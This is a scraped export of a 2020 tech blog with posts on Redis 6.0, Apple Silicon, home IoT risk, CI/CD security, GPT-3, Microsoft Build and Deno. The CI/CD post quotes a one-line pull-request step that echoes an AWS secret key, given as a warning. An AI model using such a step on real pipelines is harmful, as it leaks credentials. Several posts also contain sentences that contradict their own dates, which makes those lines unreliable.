TLS is straightforward:\ntls-port 6380 tls-cert-file /path/to/redis.crt tls-key-file /path/to/redis.key tls-ca-cert-file /path/to/ca.crt The performance overhead of TLS is measurable — expect roughly 10-15% lower throughput compared to plaintext connections. But in most real-world deployments, the network round-trip time dwarfs the TLS overhead, so the practical impact is small.\nClient-Side Caching with Tracking # A less-discussed but potentially impactful feature is client-side caching support via the new CLIENT TRACKING mechanism. Redis can now notify clients when keys they\u0026rsquo;ve previously read have been modified. This enables clients to maintain a local cache of frequently-read values and invalidate them precisely when they change, rather than polling or using short TTLs.\nThis is particularly useful for read-heavy workloads where the same keys are read thousands of times per second. Instead of hitting Redis for every read, the client reads from local memory and only queries Redis when notified of a change. In theory, this can reduce Redis load dramatically for certain access patterns.\nI haven\u0026rsquo;t deployed this in production yet — client library support is still catching up — but I\u0026rsquo;m watching the Lettuce (Java) and redis-py implementations closely.\nMy Take # Redis 6.0 is the most significant Redis release in years, not because any single feature is groundbreaking, but because the collection of features moves Redis from \u0026ldquo;fast cache that you protect with network rules\u0026rdquo; to \u0026ldquo;production-grade data store with real security and better scalability.\u0026rdquo;\nIf you\u0026rsquo;re still running Redis 5.x, the upgrade path is smooth. The new features are all opt-in — ACLs default to a default user with full access (backward compatible), I/O threading is disabled by default, and TLS requires explicit configuration. There\u0026rsquo;s very little risk in upgrading, and the ACL support alone justifies the effort.\nThe Redis ecosystem continues to impress me with its balance of simplicity and capability. In an industry that loves to pile on complexity, Redis\u0026rsquo;s commitment to doing a few things extremely well remains refreshing.\n","date":"2 July 2020","externalUrl":null,"permalink":"/posts/200702-redis-6-acls-threading-production/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Redis 6.0 brings ACLs and I/O threading to the world’s most popular in-memory data store. Here’s what the changes mean in practice.","title":"Redis 6.0 in Production — ACLs, Threading, and What Actually Matters","type":"posts"},{"content":"On Monday, Apple announced what many of us had been expecting but hoping wouldn\u0026rsquo;t happen quite yet: the Mac is moving from Intel to Apple\u0026rsquo;s own ARM-based silicon. The transition starts later this year with the first Apple Silicon Macs, and Apple expects the full lineup to make the switch within two years. This follows ARM\u0026rsquo;s success in mobile and emerging adoption in cloud infrastructure.\nI\u0026rsquo;ve been through platform transitions before. I was around for the 68k to PowerPC move, and I was very much in the thick of things during the PowerPC to Intel switch in 2005. Each time, Apple managed to pull it off more smoothly than anyone predicted. But this one feels different in scale and implication, especially for those of us who build developer tools and server-side software.\nThe Technical Foundation # Apple\u0026rsquo;s A-series chips in the iPhone and iPad have been embarrassingly fast for years now. The A12Z in the current iPad Pro already rivals many laptop-class Intel chips in single-threaded performance while sipping power. The Developer Transition Kit Apple is shipping — a Mac Mini with an A12Z — isn\u0026rsquo;t even the final silicon. It\u0026rsquo;s a teaser.\nThe architectural advantages of ARM are well-documented: better performance per watt, tighter integration between CPU, GPU, and neural engine, and a unified memory architecture that eliminates the overhead of copying data between CPU and GPU memory pools. For machine learning workloads, image processing, and video encoding, the gains should be substantial.\nWhat interests me more is what this means for the instruction set story. x86 has accumulated decades of backwards-compatibility baggage. ARM\u0026rsquo;s RISC architecture is cleaner, and Apple has the luxury of designing their chips for a single operating system. They don\u0026rsquo;t have to accommodate the weird edge cases that Intel deals with to keep ancient Windows software running.\nRosetta 2 and the Translation Layer # Apple demonstrated Rosetta 2, the translation layer that will run existing x86 Mac apps on ARM. They showed Tomb Raider running through translation at what appeared to be playable frame rates, and they demonstrated Microsoft Office running without modification.\nI\u0026rsquo;m cautiously optimistic here. The original Rosetta during the PowerPC-to-Intel transition worked better than anyone expected, but it wasn\u0026rsquo;t free — there was a measurable performance penalty, and some apps had subtle bugs. The new Rosetta has an advantage: it can do ahead-of-time translation at install time, not just JIT translation at runtime. That should help significantly with sustained workloads.\nBut here\u0026rsquo;s my concern: developer toolchains. If you\u0026rsquo;re running Docker, compiling large C++ projects, or using tools like Vagrant and VirtualBox, the transition gets complicated fast. Docker containers are built for specific architectures. You can\u0026rsquo;t just run an x86 Linux container on ARM without an emulation layer, and emulation layers for container workloads are slow.\nWhat Developers Should Do Now # If you\u0026rsquo;re a web developer working primarily in JavaScript, Python, or Ruby, your transition will probably be smooth. The interpreters and runtimes will be ported — Node.js, Python, and Ruby all run on ARM Linux already, so the macOS ARM ports should follow quickly.\nIf you\u0026rsquo;re doing systems programming in C, C++, or Rust, you\u0026rsquo;ll want to get a Developer Transition Kit and start cross-compiling. The LLVM toolchain already has excellent ARM support, so Clang and Rust\u0026rsquo;s compiler should produce native ARM binaries without drama. GCC will follow.\nIf you rely heavily on Docker for local development — and in 2020, most of us do — this is where I\u0026rsquo;d focus my attention. Docker has been running on ARM (Raspberry Pi, AWS Graviton) for a while, but the ecosystem of pre-built images is overwhelmingly x86. You\u0026rsquo;ll either need ARM-native images or you\u0026rsquo;ll be running through QEMU emulation, which is functional but not fast.\nMy immediate advice: start building multi-architecture Docker images now. Use docker buildx to create images that work on both amd64 and arm64. Even if you\u0026rsquo;re not planning to buy an ARM Mac on day one, multi-arch images are good practice — they\u0026rsquo;ll work on AWS Graviton instances too, which are often cheaper than their x86 equivalents.\nThe Virtualization Question # One area that\u0026rsquo;s genuinely uncertain is virtualization. VirtualBox doesn\u0026rsquo;t support ARM. VMware and Parallels will need new hypervisors. Running Windows on an ARM Mac will require the ARM version of Windows, which Microsoft has been developing for mobile platforms.\nFor developers who need to test on Windows or run Linux VMs locally, this could be a real pain point during the transition period. Apple announced a new virtualization framework, but details are thin. We\u0026rsquo;ll need to see how VMware and Parallels respond.\nI suspect that within 18 months, the virtualization story will be sorted out. But if you\u0026rsquo;re buying new hardware this year and you depend on running x86 VMs, the Intel Macs are still the safe bet.\nMy Take # I think this is the right move for Apple, and ultimately the right move for developers — even though the next year or two will involve some friction. ARM\u0026rsquo;s efficiency advantages are real and growing. Intel\u0026rsquo;s roadmap has been troubled, with repeated delays and a shrinking process node advantage. Apple building their own silicon gives them control over the entire stack from transistor to API, which is a powerful position.\nWhat excites me most is the potential for always-on, instant-wake laptops with genuine all-day battery life that can still compile code quickly. The current MacBook Pro is a compromise machine — it\u0026rsquo;s either fast or cool and quiet, rarely both. If Apple\u0026rsquo;s claims hold up, ARM Macs could be fast and efficient simultaneously.\nThe developer ecosystem will adapt. It always does. But if you\u0026rsquo;re making hardware purchasing decisions in the next six months, think carefully about your dependency on x86-specific tooling. The future is ARM, and it\u0026rsquo;s arriving faster than most of us expected.\n","date":"25 June 2020","externalUrl":null,"permalink":"/posts/200625-apple-silicon-arm-mac-transition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple announces the transition from Intel to custom ARM chips for Mac. Here’s what developers need to prepare for.","title":"Apple Silicon — What the ARM Mac Transition Means for Developers","type":"posts"},{"content":"Here\u0026rsquo;s an uncomfortable truth that\u0026rsquo;s been nagging at me since March: millions of knowledge workers are now connecting to corporate networks from home, and their home networks are increasingly populated with IoT devices that have the security posture of a wet paper bag. Smart speakers, security cameras, robot vacuums, smart plugs, connected appliances — all sharing a flat network with the laptop that has VPN access to production systems.\nThe numbers tell the story. Smart home device sales have surged during lockdown, with IDC reporting strong growth across smart speakers, connected lighting, and home security cameras. People stuck at home are buying devices to make their environment more comfortable and controllable. That\u0026rsquo;s perfectly rational consumer behavior. But from a security perspective, every one of those devices is a potential entry point.\nThe Flat Network Problem # Most home routers create a single, flat network. Every device — your work laptop, your kid\u0026rsquo;s tablet, the Ring doorbell, the Philips Hue bridge, that off-brand smart plug you bought for €8 — sits on the same subnet, can discover each other, and can communicate freely.\nThis is fundamentally different from a corporate environment where network segmentation, VLANs, and firewall rules provide defense in depth. In the office, a compromised IoT device in the break room can\u0026rsquo;t reach the development servers because they\u0026rsquo;re on different network segments. At home, a compromised IoT device can potentially reach your work laptop, and through the VPN, your employer\u0026rsquo;s infrastructure.\nThe attack path is real, not theoretical. Research presented at Black Hat and DEF CON over the past few years has repeatedly demonstrated that consumer IoT devices can be compromised via firmware vulnerabilities, weak default credentials, unencrypted local APIs, and supply chain manipulation. Once compromised, they can perform ARP spoofing, DNS hijacking, or direct network attacks against other devices on the same subnet.\nWhat\u0026rsquo;s Actually Running on Your Network? # I spent a rainy Sunday afternoon running nmap scans against my own home network, and the results were educational. Beyond the devices I expected, I found:\nA network printer with a web interface running an unpatched HTTP server Two smart plugs phoning home to servers in regions I\u0026rsquo;d rather they didn\u0026rsquo;t A smart TV making regular connections to advertising and analytics endpoints An old Raspberry Pi I\u0026rsquo;d forgotten about, still running Raspbian with default SSH credentials That last one was particularly embarrassing for someone who writes about security. But it illustrates the problem: home networks accumulate devices over time, and there\u0026rsquo;s no equivalent of an enterprise asset inventory or patch management system keeping track of them.\nThe Shodan search engine regularly catalogs millions of IoT devices directly accessible from the internet — UPnP-enabled routers that have punched holes in the firewall, IP cameras with default credentials, network-attached storage with known vulnerabilities. If your home router has UPnP enabled (it probably does, by default), your IoT devices may be making themselves accessible from the internet without your knowledge.\nThe Enterprise Response (So Far) # Some organizations are responding to this reality. I\u0026rsquo;ve seen a few approaches:\nSplit-tunnel VPN: Instead of routing all traffic through the corporate VPN, only route traffic destined for corporate resources. This reduces the exposure but doesn\u0026rsquo;t eliminate the risk of a compromised device on the local network attacking the work laptop directly.\nAlways-on endpoint detection: Deploying EDR (Endpoint Detection and Response) tools on corporate laptops that monitor for suspicious local network activity. This is probably the most practical approach, but it adds overhead and complexity.\nNetwork segmentation guidance: Some IT departments are publishing guides for employees on setting up guest networks for IoT devices, separate from the network used for work. Modern consumer routers often support guest networks, but they\u0026rsquo;re rarely configured.\nZero-trust networking: The most forward-looking approach — treat every network as hostile, authenticate and encrypt every connection, and never trust the network layer. Products like Cloudflare Access, Zscaler, and Google\u0026rsquo;s BeyondCorp implementation represent this direction. But adopting zero-trust is a significant architectural change that most organizations are still evaluating.\nPractical Steps for Developers # If you\u0026rsquo;re a developer working from home — and statistically, you probably are right now — here are concrete steps to reduce your exposure:\nSegment your network: Use your router\u0026rsquo;s guest network feature to isolate IoT devices. Put your work laptop and any devices you actually trust on the primary network. Everything else goes on the guest network with client isolation enabled.\nDisable UPnP: Turn off Universal Plug and Play on your router. Yes, some devices will complain. That\u0026rsquo;s fine. Manual port forwarding for the few things that genuinely need it is vastly more secure than letting every device punch holes in your firewall.\nAudit your devices: Run a network scan. Know what\u0026rsquo;s on your network. If you find devices you don\u0026rsquo;t recognize or can\u0026rsquo;t account for, investigate. Tools like Fing make this easy even without command-line expertise.\nUpdate firmware: Check for firmware updates on your router, your smart home hub, and your most critical IoT devices. Set a calendar reminder to do this monthly. Yes, it\u0026rsquo;s tedious. So is incident response.\nUse a Pi-hole or DNS-based filtering: Running a Pi-hole on your network gives you visibility into what your devices are doing and the ability to block unwanted connections. The telemetry from some IoT devices is eye-opening.\nMy Take # The collision between consumer IoT and corporate security was always coming. The pandemic just compressed the timeline from years to months. Most organizations\u0026rsquo; security models assumed that employees would connect from relatively controlled environments — corporate offices, maybe a simple home setup with a laptop and a phone. The reality of 2020 is that employees are connecting from networks populated with dozens of devices of varying provenance and security quality.\nI don\u0026rsquo;t think the answer is banning IoT devices or trying to control employees\u0026rsquo; home environments — that\u0026rsquo;s impractical and invasive. The answer is the one the security community has been advocating for years: zero-trust networking, strong endpoint security, and defense in depth. The assumption that the network is safe was always questionable. Now it\u0026rsquo;s clearly untenable.\nThe IoT industry also needs to step up. We\u0026rsquo;re still seeing devices shipped with default credentials, no automatic updates, and end-of-life support measured in months rather than years. The EU\u0026rsquo;s proposed cybersecurity labeling scheme for IoT devices can\u0026rsquo;t come soon enough. Until then, every device on your home network is a liability until proven otherwise.\n","date":"18 June 2020","externalUrl":null,"permalink":"/posts/200618-iot-growth-pandemic-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Home IoT device sales have surged during lockdowns, and every one of those devices just joined a corporate network via VPN. The security implications are significant.","title":"The Pandemic IoT Boom — More Devices, More Risk, Same Old Problems","type":"posts"},{"content":"Three months into the remote work shift, most organizations have figured out the basics: VPNs, video calls, cloud-based collaboration tools. But there\u0026rsquo;s a less visible change that concerns me more — the rapid expansion and loosening of CI/CD pipelines to accommodate distributed teams, often without corresponding security review.\nI\u0026rsquo;ve been consulting with several teams over the past few weeks, and a pattern keeps emerging: pipelines that were designed for a small team working from an office network are now exposed to a much broader set of access patterns, credentials, and integration points. The attack surface has grown, and the security posture hasn\u0026rsquo;t kept up.\nThe Credential Sprawl Problem # The most immediate risk is credential management. A typical CI/CD pipeline has access to an alarming number of secrets: cloud provider credentials, container registry tokens, database passwords, API keys for third-party services, SSH keys for deployment targets. These credentials are often stored in the CI system\u0026rsquo;s secret management — GitHub Secrets, GitLab CI variables, Jenkins credentials store — but the scope of who and what can trigger pipeline runs has expanded.\nBefore March, many teams had implicit security controls: code was pushed from known IP ranges, builds ran on on-premises Jenkins servers, deployment was gated by a few senior engineers who were physically present. Now, code is pushed from home networks, self-hosted runners are accessed over VPN, and the pressure to ship quickly has loosened change approval processes.\nI reviewed one team\u0026rsquo;s GitHub Actions configuration last week and found production AWS credentials with AdministratorAccess being injected into every pull request build — including PRs from forks. That\u0026rsquo;s not a theoretical vulnerability; it\u0026rsquo;s an open door. Anyone who submits a PR can exfiltrate those credentials by adding a run: echo $AWS_SECRET_ACCESS_KEY step.\nSupply Chain Attacks via Build Dependencies # The second vector that worries me is dependency resolution during builds. Most modern build pipelines pull dependencies from public registries — npm, PyPI, Maven Central, Docker Hub — as part of every build. In a secure network, you might have a proxy or artifact cache that provides some control. In the rush to enable remote builds, several teams I\u0026rsquo;ve talked to bypassed these caches because they were only accessible from the office network.\nThis means builds are now pulling directly from public registries, which exposes them to dependency confusion attacks, typosquatting, and compromised packages. The recent research by Alex Birsan on dependency confusion hasn\u0026rsquo;t been published yet, but the underlying vulnerability — that private package names can be shadowed by public packages with higher version numbers — has been known for a while.\nThe mitigation is straightforward in principle: use a package proxy like Artifactory, Nexus, or even a simple npm/PyPI mirror, and configure your builds to pull exclusively from it. Pin your dependency versions. Use lock files. Verify checksums. Most teams know this but haven\u0026rsquo;t implemented it consistently across all build environments.\nSelf-Hosted Runners: The Forgotten Perimeter # If you\u0026rsquo;re running self-hosted CI runners — whether Jenkins agents, GitLab runners, or GitHub Actions self-hosted runners — you\u0026rsquo;ve effectively created compute resources that execute arbitrary code triggered by repository events. In an on-premises environment with proper network segmentation, the blast radius of a compromised runner is limited.\nIn a remote-work setup, runners are often provisioned in cloud environments with broader network access. They might have credentials to reach production infrastructure, internal APIs, or databases. A malicious or compromised pipeline step can use the runner as a pivot point into your infrastructure.\nGitHub has documented the risks of self-hosted runners with public repositories, but the same principles apply to private repos if you don\u0026rsquo;t trust all contributors. The recommendation is to run builds in ephemeral, isolated environments — containers or VMs that are destroyed after each build. But implementing this properly requires investment in infrastructure that many teams haven\u0026rsquo;t made.\nHardening Recommendations # Based on what I\u0026rsquo;ve seen across multiple teams, here\u0026rsquo;s a practical checklist for tightening your CI/CD security:\nCredential scoping: Never inject production credentials into PR builds. Use environment-based secret scoping (GitHub\u0026rsquo;s environment protection rules, GitLab\u0026rsquo;s protected variables). Rotate credentials regularly — if you haven\u0026rsquo;t rotated since the office closed, do it now.\nBuild isolation: Run builds in ephemeral containers. Don\u0026rsquo;t reuse build environments across projects. If you\u0026rsquo;re using self-hosted runners, ensure they don\u0026rsquo;t have network access to production systems.\nDependency pinning: Pin all dependencies to specific versions with lock files. Use a private artifact proxy. Consider tools like Dependabot or Renovate for automated dependency updates with review.\nPipeline-as-code review: Treat your CI configuration files (.github/workflows/*.yml, .gitlab-ci.yml, Jenkinsfile) as security-critical code. Require review for changes. Use CODEOWNERS to restrict who can modify pipeline definitions.\nAudit logging: Enable and monitor audit logs for your CI system. Know who triggered what build, what credentials were accessed, and what artifacts were produced. Most CI systems provide this; few teams actually look at the logs.\nMy Take # CI/CD pipelines have become the circulatory system of modern software delivery. We\u0026rsquo;ve invested heavily in making them fast, reliable, and automated. We haven\u0026rsquo;t invested nearly enough in making them secure.\nThe remote work shift didn\u0026rsquo;t create these vulnerabilities — they were always there. But it removed several layers of implicit security (network perimeter, physical presence, slow pace of change) that were masking the underlying risks. The teams that had already adopted zero-trust principles for their build infrastructure are fine. The teams that relied on \u0026ldquo;well, it\u0026rsquo;s on the internal network\u0026rdquo; are now scrambling.\nMy advice: treat your CI/CD pipeline with the same security rigor you apply to production systems. Because in practice, it is a production system — one that has access to all your other production systems. The fact that it runs in the background and \u0026ldquo;just works\u0026rdquo; makes it easy to overlook. Don\u0026rsquo;t.\nIf you only do one thing this week, audit the credentials available to your PR builds. You might not like what you find.\n","date":"11 June 2020","externalUrl":null,"permalink":"/posts/200611-cicd-pipeline-security-remote-work/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As teams rushed to enable remote development workflows, CI/CD pipelines became a prime target. Here’s what’s going wrong and how to harden your build infrastructure.","title":"Your CI/CD Pipeline Is Your New Attack Surface — And Remote Work Made It Worse","type":"posts"},{"content":"OpenAI just dropped their GPT-3 paper, and the numbers alone are staggering: 175 billion parameters, trained on a filtered version of Common Crawl plus books and Wikipedia, at an estimated training cost of several million dollars in compute. That\u0026rsquo;s roughly 100x larger than GPT-2, which itself was considered large when it launched just over a year ago. But the size isn\u0026rsquo;t the story — it\u0026rsquo;s what the model can do without being explicitly trained for specific tasks.\nFew-Shot Learning: The Real Breakthrough # The core finding of the paper is that GPT-3 can perform a wide range of NLP tasks — translation, question answering, arithmetic, even basic code generation — with just a handful of examples provided in the prompt. No fine-tuning, no task-specific training data, no gradient updates. You write a prompt with a few examples of the pattern you want, and the model generalizes.\nThis is what the researchers call \u0026ldquo;few-shot learning,\u0026rdquo; and it represents a meaningful shift from the fine-tuning paradigm that has dominated NLP since BERT. This in-context learning capability would eventually become central to how developers interact with large language models. With BERT and its descendants, you take a pre-trained model and fine-tune it on a labeled dataset for your specific task. That works well but requires curating training data and running training jobs for every new application.\nGPT-3 suggests an alternative: a single model, large enough, might learn to perform tasks just from the structure of natural language itself. The implications for practical NLP applications are significant. If you can get useful results from a few prompt examples instead of thousands of labeled training samples, that changes the economics of building language-powered features.\nWhat It Can (and Can\u0026rsquo;t) Do # The paper tests GPT-3 across dozens of benchmarks. On some, it matches or exceeds the state of the art set by fine-tuned models. On others, it falls short. The pattern is interesting: GPT-3 excels at tasks that can be framed as text completion or text transformation. Translation, summarization, question answering — these map naturally to \u0026ldquo;given this context, produce this output.\u0026rdquo;\nWhere it struggles is with tasks requiring precise logical reasoning or structured output. The arithmetic examples are illustrative: GPT-3 can do simple addition and subtraction, but accuracy drops sharply as the numbers get larger. It\u0026rsquo;s pattern-matching, not computing.\nThe code generation examples are particularly interesting for developers. The paper shows GPT-3 generating simple Python functions from natural language descriptions. Not production-quality code, and not reliably, but the fact that it can do it at all from few-shot prompts suggests a direction that could eventually be useful for developer tooling.\nThe Scale Question # GPT-3 raises uncomfortable questions about the trajectory of AI research. The model\u0026rsquo;s performance scales with size in a fairly predictable way — the paper includes scaling curves showing steady improvement from 125 million to 175 billion parameters. The implication is that making models bigger makes them better, at least up to the scales tested.\nBut training a 175 billion parameter model is not something most organizations can do. The compute cost alone is estimated at $4.6 million for a single training run, according to Lambda Labs\u0026rsquo; analysis. That doesn\u0026rsquo;t include the engineering effort, the data pipeline, or the iteration cycles that inevitably precede a successful training run.\nThis creates a concentration dynamic where only a handful of organizations — OpenAI, Google, Facebook, and a few others — can train models at this scale. OpenAI has signaled that they\u0026rsquo;ll offer API access rather than releasing the model weights, which is a different approach from the open-source ethos that has driven much of AI research.\nWhether that\u0026rsquo;s the right call is debatable. GPT-2\u0026rsquo;s staged release (where OpenAI initially withheld the full model) was controversial but arguably reasonable — though the dire predictions about misuse didn\u0026rsquo;t fully materialize. GPT-3 is powerful enough that the API-only approach might make more sense from a safety perspective. But it also means the broader research community can\u0026rsquo;t inspect, reproduce, or build upon the work in the way that has traditionally accelerated progress. When the API finally launched, developer access opened up new possibilities.\nWhat This Means for Developers # If you\u0026rsquo;re a developer thinking about integrating language AI into applications, GPT-3 is both exciting and frustrating. Exciting because the few-shot capability dramatically lowers the barrier to experimenting with NLP features. Once the API became available, developers could immediately begin exploring its capabilities and limitations.\nIn the meantime, the practical options remain fine-tuning smaller models like GPT-2, BERT, or the various transformer variants available through Hugging Face. For most production use cases, a well-tuned smaller model will still outperform GPT-3\u0026rsquo;s few-shot capabilities within its specific domain.\nThe more important takeaway is strategic: language models are getting good enough, fast enough, that every application that involves text — and that\u0026rsquo;s most of them — should be thinking about where AI-powered text processing could add value. Search, summarization, classification, generation — these capabilities are moving from research demos to production features faster than many of us expected.\nMy Take # I\u0026rsquo;ve been following NLP progress since the days of rule-based systems and bag-of-words models, and the pace of change in the last three years has been extraordinary. GPT-3 doesn\u0026rsquo;t feel like a breakthrough in the scientific sense — it\u0026rsquo;s more of a brute-force scaling result that validates the transformer architecture\u0026rsquo;s potential. But it may be a breakthrough in the practical sense, by making it easy enough to build useful language features that more developers actually do it.\nMy worry is the concentration effect. If the most capable models are only available through APIs controlled by a few companies, that shapes who gets to build what. The open-source ecosystem around transformers — Hugging Face, the various BERT variants, projects like EleutherAI that are trying to replicate large models openly — is critical to keeping this technology accessible.\nFor now, I\u0026rsquo;d recommend every development team spend an afternoon experimenting with the current generation of publicly available models. The capabilities might surprise you, and you\u0026rsquo;ll be better positioned to take advantage of GPT-3 when — or if — it becomes accessible.\n","date":"28 May 2020","externalUrl":null,"permalink":"/posts/200528-openai-gpt3-language-model/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI publishes the GPT-3 paper, a 175 billion parameter language model that demonstrates surprising few-shot learning capabilities across a range of NLP tasks.","title":"GPT-3 — OpenAI's 175 Billion Parameter Bet on Language","type":"posts"},{"content":"Microsoft Build just wrapped up, and even though it was their first fully-virtual conference — a sign of the times — the announcements packed a serious punch for developers. The headline for me? WSL 2 hitting general availability with the Windows 10 May 2020 Update. After years of Windows being a second-class citizen for systems programming, we\u0026rsquo;re in a genuinely different world now.\nWSL 2: Linux on Windows, Done Right # I\u0026rsquo;ve been running the WSL 2 preview for a few months, and the jump from WSL 1 to WSL 2 is not incremental — it\u0026rsquo;s architectural. WSL 1 was a compatibility layer that translated Linux syscalls to Windows NT kernel calls. Clever, but limited. WSL 2 runs an actual Linux kernel in a lightweight VM, managed by the Hyper-V hypervisor. The result is full system call compatibility and dramatically better file system performance.\nThe numbers Microsoft shared are striking: tar extraction is roughly 20x faster, git clone about 2-3x faster, and npm install noticeably snappier. For anyone who has suffered through Node.js dependency resolution on Windows, that alone might be worth the upgrade.\nWhat excites me more than raw performance is the implication for development workflows. With WSL 2, you can run Docker containers natively through the Docker Desktop WSL 2 backend. No more Hyper-V VM sitting alongside your dev environment. Your containers run inside WSL 2, sharing the same Linux kernel. It\u0026rsquo;s cleaner, faster, and uses less memory. I\u0026rsquo;ve been testing this with a moderately complex microservices setup and the difference in startup time is noticeable.\nThe integration with VS Code via the Remote - WSL extension means you can edit files on the Windows side while your build tools, linters, and language servers run inside Linux. It\u0026rsquo;s the best of both worlds, and it actually works well in practice — something I couldn\u0026rsquo;t say about earlier attempts at cross-platform development on Windows.\nWindows Terminal 1.0: Finally, a Proper Terminal # Alongside WSL 2, Microsoft shipped Windows Terminal 1.0. It sounds almost absurd to celebrate a terminal emulator in 2020, but anyone who has used the default Windows console knows this was long overdue. GPU-accelerated text rendering, tabs, split panes, full Unicode and emoji support, and a JSON-based configuration file.\nThe JSON config is a deliberate nod to the developer audience. No registry hacks, no buried settings dialogs — just a config file you can version-control alongside your dotfiles. It\u0026rsquo;s a small thing, but it signals that the Windows team understands how developers work.\nI\u0026rsquo;ve switched to it as my daily driver for both PowerShell and WSL sessions. The ability to have a Bash tab next to a PowerShell tab next to an Azure Cloud Shell tab is genuinely useful when you\u0026rsquo;re juggling infrastructure work across environments.\nAzure and the Cloud Developer Experience # Build 2020 also showcased a wave of Azure announcements. Azure Static Web Apps entered preview, offering a streamlined deployment pipeline for JAMstack applications that connects directly to GitHub repos. Azure Communication Services was announced as a competitor to Twilio. And Azure Synapse Analytics got tighter integration with Power BI and Azure Machine Learning.\nBut the theme that ran through everything was reducing friction for developers. Project Reunion, now in early stages, aims to unify the Win32 and UWP app models — a long-standing pain point for Windows developers. WinUI 3.0 Preview was shown running outside the UWP sandbox for the first time.\nMicrosoft is also pushing hard on GitHub integration across Azure DevOps, with GitHub Actions for Azure getting expanded capabilities. Given that GitHub Actions is already eating into the CI/CD market, tighter Azure integration could make it the path of least resistance for teams already in the Microsoft ecosystem.\nMy Take # I\u0026rsquo;ve been working with Microsoft technologies on and off for three decades, and the transformation under Nadella continues to impress. Five years ago, telling someone that Microsoft would ship a Linux kernel inside Windows and make their terminal open-source on GitHub would have sounded like a joke. Today, it\u0026rsquo;s just\u0026hellip; Wednesday at Build.\nThe developer-first strategy is paying off. By making Windows a credible platform for Linux development, Microsoft is addressing the single biggest reason many developers switched to macOS. You no longer need to choose between Windows-native tools and a proper Unix environment.\nThat said, WSL 2 isn\u0026rsquo;t perfect. File system performance across the Windows/Linux boundary (accessing /mnt/c from Linux) is still slower than native Linux paths. The networking model can be confusing — WSL 2 gets its own IP address, which trips up some port-forwarding scenarios. And GPU compute support is still in early preview.\nBut the trajectory is clear. Microsoft is building a platform where you can develop for any target — Linux servers, containers, cloud — without leaving Windows. For enterprise shops where Windows is mandated on developer machines, that\u0026rsquo;s transformative. For the rest of us, it\u0026rsquo;s a compelling reason to give Windows another look.\nThis Build felt less like a product announcement and more like a statement of direction. The developer experience is the product. And right now, Microsoft is executing on that vision better than most.\n","date":"21 May 2020","externalUrl":null,"permalink":"/posts/200521-microsoft-build-2020-wsl2/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2020 goes fully virtual and doubles down on developer experience with WSL 2 GA, Windows Terminal 1.0, and tighter Azure integrations.","title":"Microsoft Build 2020 — WSL 2, Windows Terminal, and the Developer-First Pivot","type":"posts"},{"content":"Yesterday, Deno 1.0 was released. If you\u0026rsquo;re not familiar with the backstory: Deno is a new JavaScript and TypeScript runtime created by Ryan Dahl, the same person who created Node.js. In his now-famous 2018 JSConf talk \u0026ldquo;10 Things I Regret About Node.js,\u0026rdquo; Dahl catalogued the design mistakes he made with Node and announced he was building something new. Two years later, that something is here. This comes amid broader evolution in the JavaScript ecosystem, where TypeScript continues to mature and Node.js itself improves on its core fundamentals.\nI\u0026rsquo;ve been following Deno\u0026rsquo;s development since that talk, and I\u0026rsquo;ve been running the pre-release versions for side projects over the past few months. Now that it\u0026rsquo;s hit 1.0, it\u0026rsquo;s worth a serious look at what it gets right, what it gets wrong, and whether it has a realistic path to meaningful adoption.\nWhat Deno Does Differently # The differences from Node.js are philosophical as much as technical. Let me highlight the ones that matter most.\nSecurity by default. Deno runs with no file, network, or environment access unless explicitly granted. Want to read a file? You need --allow-read. Want to make an HTTP request? --allow-net. This is a dramatic departure from Node, where any script can access the full filesystem, make network calls, and read environment variables. The Node model made sense in 2009 when server-side JavaScript was a novelty and scripts were trusted by default. In 2020, when we routinely install hundreds of npm packages from anonymous authors, the lack of sandboxing in Node is genuinely concerning. Deno\u0026rsquo;s approach isn\u0026rsquo;t perfect — the permissions are coarse-grained and can be annoying in development — but the principle is sound.\nTypeScript built in. Deno compiles TypeScript natively, no tsconfig.json, no ts-node, no build step. You write .ts files and run them directly. The TypeScript compiler is bundled into the Deno binary, and compilation results are cached. This is a remarkable developer experience improvement. TypeScript has been evolving rapidly to support better developer experiences, and Deno\u0026rsquo;s integration takes this to the next level. In the Node world, using TypeScript means maintaining a parallel build pipeline — configuring tsc, setting up source maps, managing declaration files. Deno eliminates all of that friction.\nNo node_modules. Perhaps the most radical decision. Deno doesn\u0026rsquo;t have a package manager. Modules are imported via URLs, similar to how browsers handle ES modules. Instead of npm install express and require('express'), you write import { serve } from \u0026quot;https://deno.land/std/http/server.ts\u0026quot;. Modules are downloaded and cached on first run.\nStandard library. Deno ships with a reviewed standard library covering common tasks: HTTP servers, file system utilities, testing, logging, datetime manipulation. This is something Node has always lacked — in the Node ecosystem, you need a third-party package for practically everything, which is why a typical node_modules folder contains hundreds of packages for even simple projects.\nThe Good # Having used Deno for a few small projects, the developer experience is genuinely pleasant. The single binary installation (one curl command), native TypeScript, and built-in tooling (deno fmt, deno test, deno lint) create a cohesive environment that Node can\u0026rsquo;t match without a stack of third-party tools.\nThe standard library is well-designed and draws on Go\u0026rsquo;s standard library philosophy: include enough that developers don\u0026rsquo;t need external dependencies for common tasks, maintain a high quality bar, and provide consistent APIs. The HTTP server module, for instance, is simple enough for basic use and composable enough for more complex scenarios.\nThe permissions model, while occasionally annoying during development, forces you to think about what your code actually needs. I ran a dependency analysis on one of my Node projects recently and realized that transitive dependencies had access to my entire filesystem and network. With Deno, that surface area is explicit and visible.\nAnd the URL-based imports, controversial as they are, eliminate the entire class of problems around package resolution, hoisting, phantom dependencies, and the node_modules black hole. No more npm install and praying that your lockfile resolves correctly. No more EACCES permission errors. No more wondering why your build works locally but fails in CI because of subtly different dependency resolution.\nThe Challenges # Let\u0026rsquo;s not sugarcoat the obstacles. Deno faces enormous challenges.\nThe npm ecosystem is Node\u0026rsquo;s greatest asset, and Deno can\u0026rsquo;t access it. There are over 1.3 million packages on npm, representing hundreds of thousands of developer-years of effort. Deno has its own module registry at deno.land/x, but it currently hosts a few hundred modules. For any non-trivial application, you\u0026rsquo;re going to hit a wall where the library you need exists on npm but not for Deno.\nURL-based imports have real problems. What happens when the server hosting your dependency goes down? What about versioning — do you pin to a specific URL path, or do you risk importing breaking changes? Deno addresses some of this with import maps and lock files, but the ergonomics aren\u0026rsquo;t there yet. 